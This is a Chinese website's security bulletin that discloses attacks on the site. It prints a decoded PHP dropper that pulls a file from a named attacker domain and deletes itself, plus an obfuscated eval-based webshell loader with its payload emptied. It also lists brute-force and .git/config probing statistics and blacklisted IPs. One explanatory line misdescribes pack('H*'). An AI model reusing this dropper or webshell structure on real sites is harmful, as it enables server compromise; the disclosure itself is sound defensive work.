这里是博览晴空网站正在遭受的安全攻击,我们将会如实公开,与站长们一起分享。
千万不要被留在这个板块里面哦~
球球各位大佬手下留情,不要再拿小站试了ヽ(≧□≦)ノ
Tips:相关内容被隐去,请勿模仿!
1. 上传PHP文件
2024.3.19~2024.4.11(14天)内共请求552次;User-Agent:Python-urllib/3.12(224次)、Python-urllib/3.7(328次)
使用Pboot 模板引擎模板标签试图下载PHP文件
将请求解码后的PHP文件为
<?php
file_put_contents('configs.php',file_get_contents(''));
echo 'hs11888';
unlink(__FILE__);
代码下载了一个PHP文件,并且将自身文件删除
请求根域名:hth01.cc
下载后文件为:
<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "";
class x{
function c($s){
$a = array($s,"","","");
evaL($a[mt_rand(0,0)].$a[3]);
}
}
function s(){
$str = "";
$str = str_rot13($str);
m($str);
}
function m($str=""){
global $password;
$pl = pack('H*',$str);
$zz = new x();
$zz->c($pl);
}
s();
?>
- 设置错误报告级别为 E_ERROR,关闭错误显示,设置最大执行时间为 20000 秒,内存限制为 256M。
- 定义一个名为 x 的类,其中包含一个名为 c 的方法,该方法接受一个参数 str,并使用eval函数执行s,并使用evaL函数执行 s。
- 定义一个名为 s 的函数,该函数将一个空字符串进行 str_rot13 编码,然后调用 m 函数。
- 定义一个名为 m 的函数,该函数接受一个参数 str,将 str 转换为十六进制表示的字符串,然后创建一个 x 类的实例,并调用其 c 方法。
- 调用 s 函数。
2. 多次尝试爆破后台登录
近90天共遭受15317次攻击(其中港澳台14923次)
主要是通过admin的弱密码进行无限次尝试
3. 请求Git配置文件
请求路径:/.git/config
近90天共遭受152次(其中境外16次,大陆地区136次)
config可能含有:
- 项目的基本信息:包括项目的名称、描述等。
- 远程仓库信息:包括远程仓库的 URL、分支等。
- 分支信息:包括本地分支和远程分支的关联关系等。
- 用户信息:包括用户的姓名、邮箱等。
4. SQL注入等攻击
黑名单:
- 118.77.144.45 山西省 联通
- 36.133.43.108 河南省 移动
安全通报板块将会不定期更新
请勿进行非法请求,我们将保留追究攻击者法律责任的权利。
请务必遵守《中华人民共和国个人信息保护法》、《中华人民共和国网络安全法》等相关法律政策。